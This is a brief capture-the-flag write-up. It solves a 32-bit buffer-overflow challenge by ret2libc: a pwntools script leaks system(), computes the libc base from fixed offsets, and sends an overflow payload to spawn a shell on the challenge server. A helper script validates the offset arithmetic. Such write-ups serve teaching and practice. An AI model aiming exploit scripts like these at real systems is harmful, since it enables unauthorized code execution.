The binary prints the addresses of binsh and the system function, but binsh is an address in bss,
so use the leaked system address to compute libc_base and then do ROP.
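```python
from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3018)

# The service prints two addresses after ': ' -- binsh (in bss) and system
r.recvuntil(b': ')
binsh = int(r.recv(10), 16)
print(hex(binsh))
system = int(r.recv(10), 16)
print(hex(system))

# Derive the libc base from the leaked system address,
# then recompute binsh as an address inside libc
libc_base = system - 0x03a940
binsh = libc_base + 0x15902b

# 136 bytes of padding, then system / dummy return address / argument
payload = b'A' * 136
payload += p32(system)
payload += b'AAAA'
payload += p32(binsh)

r.sendline(b'A')
r.sendline(payload)
r.interactive()
```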
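The libc_base calculation above, as an added example that is not part of the original write-up: it parses a leak line, derives libc_base and the libc binsh address using the write-up's two offsets, and rejects a base that is not page aligned, which is the usual sign that the offsets belong to a different libc build. The sample line and the names `parse_leak`, `resolve` and `SAMPLE` are assumptions made for illustration.

```python
import re

# Offsets copied from the write-up's script; they are only valid for the
# libc build the challenge uses.
SYSTEM_OFFSET = 0x03a940
BINSH_OFFSET = 0x15902b
PAGE_MASK = 0xfff  # library mappings are page aligned (4 KiB pages)

# Constructed sample of the service's output, not captured from the challenge.
SAMPLE = b'leak: 0x8049940 0xf7d7b940\n'


def parse_leak(line):
    """Return (bss_addr, system_addr) from a line holding two hex addresses."""
    found = re.findall(rb'0x[0-9a-fA-F]+', line)
    if len(found) != 2:
        raise ValueError('expected exactly two hex addresses, got %d' % len(found))
    return int(found[0], 16), int(found[1], 16)


def resolve(system_addr):
    """Return (libc_base, binsh_addr) derived from a leaked system address."""
    base = system_addr - SYSTEM_OFFSET
    if not 0 < base < 2**32:
        raise ValueError('base outside the 32-bit address space')
    # ASLR moves the library in whole pages, so the low 12 bits of a correct
    # base are always zero; anything else means the offsets do not match.
    if base & PAGE_MASK:
        raise ValueError('base %#x is not page aligned: wrong libc offsets?' % base)
    return base, base + BINSH_OFFSET


if __name__ == '__main__':
    bss_addr, system_addr = parse_leak(SAMPLE)
    base, binsh = resolve(system_addr)
    print('bss buffer :', hex(bss_addr))
    print('libc base  :', hex(base))
    print('/bin/sh    :', hex(binsh))
```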